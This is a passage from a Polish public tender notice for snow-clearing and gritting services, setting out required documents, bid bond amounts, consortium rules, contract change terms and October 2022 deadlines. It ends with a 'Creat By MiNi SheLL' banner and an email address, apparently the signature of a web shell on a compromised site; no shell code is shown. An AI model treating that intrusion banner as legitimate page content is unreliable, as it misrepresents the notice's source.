Rozwoju, Pracy i Technologii z dnia 23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia, dowodami tymi są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>3)	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych świadczenie usług wraz z informacją na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami na potwierdzenie spełnienia warunku udziału w postępowaniu o którym mowa w Rozdziale V § 2 ust. 1 pkt 2 SWZ - sporządzony wg wzoru stanowiącego załącznik nr 12 do Specyfikacji;<br/>4)	wykazu narzędzi lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - sporządzony wg wzoru stanowiącego załącznik nr 13 do Specyfikacji.<br/>3.	W przypadku, kiedy Wykonawca, w celu wykazania spełnienia warunków udziału w niniejszym postępowaniu, będzie polegał na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy, w celu umożliwienia Zamawiającemu dokonania oceny, czy Wykonawca będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia oraz czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Wykonawca przedłoży wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby, określone w Rozdziale V § 3 ust. 3.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta Wykonawcy powinna składać się z następujących dokumentów:<br/>1)	oferty sporządzonej na formularzu stanowiącym załącznik nr 1 do Specyfikacji,<br/>(w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia – z wykorzystaniem dodatkowego formularza stanowiącego załącznik nr 1a do Specyfikacji)<br/>2)	formularza cenowego, sporządzonego na formularzu stanowiącym załącznik nr 2a i/lub 2b do Specyfikacji odpowiednio dla części 1 i/lub 2 zamówienia,<br/>3)	oświadczenia Wykonawcy dotyczącego spełniania warunków udziału w postępowaniu oraz podstaw wykluczenia, sporządzonego na formularzu stanowiącym załącznik nr 6 do Specyfikacji<br/>4)	oryginału lub notarialnie poświadczonej kopii pełnomocnictw osób podpisujących ofertę w imieniu Wykonawcy, o ile nie wynika to z innych dokumentów załączonych przez Wykonawcę, <br/>Pełnomocnictwo dołączone do oferty musi być złożone w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, w przypadku gdy Wykonawca nie posiada pełnomocnictwa w formie elektronicznej oryginalnej (tj. z kwalifikowanym podpisem osoby uprawnionej do jego udzielenia), a posiada dla danej osoby pełnomocnictwo tylko w formie pisemnej (tj. z własnoręcznym podpisem osoby uprawnionej do jego udzielenia), może złożyć elektroniczną kopię pełnomocnictwa, ale notarialnie poświadczoną elektronicznie – stosownie do art. 97 § 2 ustawy z dnia 14.02.1991 r. – prawo o notariacie (tj. Dz. U. z 2020 r. poz. 1192) elektroniczne poświadczenie zgodności odpisu, wyciągu lub kopii z okazanym dokumentem notariusz opatruje kwalifikowanym podpisem elektronicznym, <br/>Złożenie pełnomocnictwa w elektronicznej kopii zwykłej lub kopii poświadczonej za zgodność <br/>z oryginałem nie przez notariusza (niepoświadczonej notarialnie) będzie uważane za niezłożenie pełnomocnictwa, co w konsekwencji będzie powodowało wdrożenie przez Zamawiającego odpowiednich procedur i sankcji określonych w ustawie na wypadek niezłożenia pełnomocnictwa <br/>w sytuacji, kiedy jest ono wymagane.<br/>5)	pełnomocnictwa dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy),<br/>6)	dowodu wniesienia wadium – oryginalny dokument elektroniczny potwierdzający wniesienie wadium w formie innej niż pieniądz, w przypadku gdy Wykonawca składa wadium w tej formie (poręczenie, gwarancja), sporządzony zgodnie z wymaganiami określonymi w Rozdziale IX SWZ. W przypadku wniesienia wadium w pieniądzu na rachunek bankowy Zamawiającego, Wykonawca dołącza do oferty potwierdzenie przelewu w postaci elektronicznej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga, aby oferta była zabezpieczona wadium o wartości:<br/>1)	1.500,00 zł (sł.: tysiąc pięćset złotych) – dla części 1 zamówienia;<br/>2)	1.500,00 zł (sł.: tysiąc pięćset złotych) – dla części 2 zamówienia.<br/>2.	Wadium może być wniesione w następujących formach:<br/>1)	pieniądzu,<br/>2)	poręczeniach bankowych lub poręczeniu spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3)	gwarancjach bankowych,<br/>4)	gwarancjach ubezpieczeniowych,<br/>5)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Oferta Wykonawcy, który nie wniósł wymaganego wadium lub wadium wniesione zostało nieprawidłowo, zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnienie tych warunków zgodnie z zapisami zawartymi w Rozdziale VI i VII Specyfikacji. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu <br/>i zawarcia umowy. Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą, będą zobowiązani przedstawić Zamawiającemu przed zawarciem umowy stosowne porozumienie (np. umowę konsorcjum/umowę spółki cywilnej) zawierające w swojej treści co najmniej następujące postanowienia:<br/>1)	skład konsorcjum (spółki cywilnej) nie może zostać zmieniony bez uprzedniej zgody Zamawiającego w toku niniejszego postępowania o udzielenie zamówienia, jak również przez cały okres wykonywania umowy,<br/>2)	Wykonawcy tworzący konsorcjum (wspólnicy spółki cywilnej) będą solidarnie odpowiedzialni wobec Zamawiającego zarówno co do udziału w postępowaniu o udzielenie zamówienia, jak i w umowie zawartej w postępowaniu,<br/>3)	wszyscy członkowie konsorcjum (wspólnicy spółki cywilnej) ponoszą solidarną, niczym nie ograniczoną odpowiedzialność prawną za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w ofercie wskazują, które usługi wykonają poszczególni wykonawcy.<br/>3.	Zamawiający określa szczególny, obiektywnie uzasadniony, sposób spełniania przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu:<br/>1)	warunek określony w § 2 ust. 1 pkt 1 niniejszego rozdziału będzie uznany za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże posiadanie doświadczenia określonego w tym warunku w odniesieniu do każdej części zamówienia i wykona usługi do realizacji których te zdolności są wymagane;<br/>2)	warunek określony w § 2 ust. 1 pkt 2 niniejszego rozdziału będzie uznany za spełniony, jeżeli jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże, że samodzielnie dysponuje wymaganym potencjałem osobowym, lub więcej Wykonawców wspólnie i wykonają usługi, do realizacji których te zdolności są wymagane;<br/>3)	warunek określony w § 2 ust. 1 pkt 3 niniejszego rozdziału będzie uznany za spełniony, jeżeli jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże, że samodzielnie dysponuje wymaganymi pojazdami/sprzętem lub więcej Wykonawców wspólnie i przekażą ten potencjał do wykorzystania w trakcie realizacji przedmiotu zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Na podstawie art. 455 ust. 1 pkt 1 ustawy Zamawiający przewiduje możliwość następujących zmian umowy bez konieczności przeprowadzenia nowego postępowania:<br/>1)	Strony mają prawo do przedłużenia terminu wykonywania usług maksymalnie o okres do 14 dni, w sytuacji gdy wystąpią warunki atmosferyczne, wymagające świadczenia usług w okresie dłuższym niż pierwotny okres realizacji umowy, w sytuacji, gdy nie wyczerpano w całości wynagrodzenia o którym mowa w § 10 ust. 1;<br/>2)	Strony mają prawo do dokonania zmiany umowy polegającej na zwiększeniu liczby cykli roboczych odśnieżania i/lub posypywania w stosunku do całej lub części powierzchni nieruchomości ujętych w Wykazie nieruchomości, który stanowi załącznik nr 4 do umowy, w sytuacji, gdy warunki atmosferyczne w trakcie realizacji umowy spowodują zwiększenie częstotliwości wykonania usług i kwota wynagrodzenia o którym mowa w § 10 ust. 1 wyczerpie się przed terminem obowiązywania umowy lub gdy nastąpi w trakcie umowy nastąpi przejęcie przez Zamawiającego nowych powierzchni w zarządzanie. Strony przewidują możliwość zwiększenia wynagrodzenia Wykonawcy na skutek dokonania zmiany o której mowa w zdaniu pierwszym – w zakresie nie większym niż 30% wynagrodzenia o którym mowa w § 10 ust. 1 wyliczonym na podstawie cen jednostkowych zawartych w Formularzu cenowym, który stanowi załącznik nr 2 do umowy. Podstawą do dokonania zmiany będzie protokół konieczności zatwierdzony przez Zamawiającego, który będzie zawierał wyliczenie zwiększonego zakresu zamówienia oraz wartości wynagrodzenia należnego Wykonawcy;<br/>3)	Strony mają prawo do dokonania zmiany umowy w zakresie wysokości określonego w § 10 ust. 1 wynagrodzenia, spowodowanych zmianą stawki podatku od towarów i usług – w części obejmującej wynagrodzenie brutto za usługi niezbędne do wykonania przedmiotu umowy, wykonane od dnia obowiązywania nowej stawki podatku, bez zmiany wartości netto wynagrodzenia, z zastrzeżeniem postanowień przepisów wprowadzających nową stawkę podatku,<br/>2)	Strony mają prawo do dokonania zmiany umowy spowodowanej przyczynami zewnętrznymi, niezależnymi od Zamawiającego oraz Wykonawcy skutkującymi niemożliwością wykonania usługi na warunkach określonych w umowie (w szczególności spowodowane zmianami obowiązującego prawa w zakresie przedmiotu zamówienia, interwencjami mieszkańców, instytucji miejskich lub innych instytucji państwowych),<br/>3)	Strony mają prawo do dokonania zmiany umowy gdy jest ona korzystna dla Zamawiającego, w szczególności gdy obniży to koszty wykonywanych usług albo skróci czas realizacji poszczególnych zleceń, <br/>4)	Strony mają prawo do dokonania zmiany umowy gdy jest ona spowodowana decyzjami właściwych organów administracji publicznej, w tym administracji zespolonej, w szczególności organów nadzoru budowlanego czy służby ochrony zabytków,<br/>5)	Strony mają prawo do dokonania zmiany osób wskazanych w § 3,<br/>6)	Strony mają prawo do zmiany umowy w sytuacji wskazania przez Wykonawcę nowego podwykonawcy bądź zmiany wskazanych w § 7 podwykonawców lub zakresu robót wykonywanych przez aktualnych podwykonawców. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-25 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-25 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga od Wykonawcy, którego oferta zostanie wybrana wniesienia bezwarunkowego zabezpieczenia należytego wykonania umowy. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. Zabezpieczenie należytego wykonania umowy wnosi się przed zawarciem umowy, w wysokości 5% ceny całkowitej brutto podanej w ofercie – w odniesieniu do każdej części zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com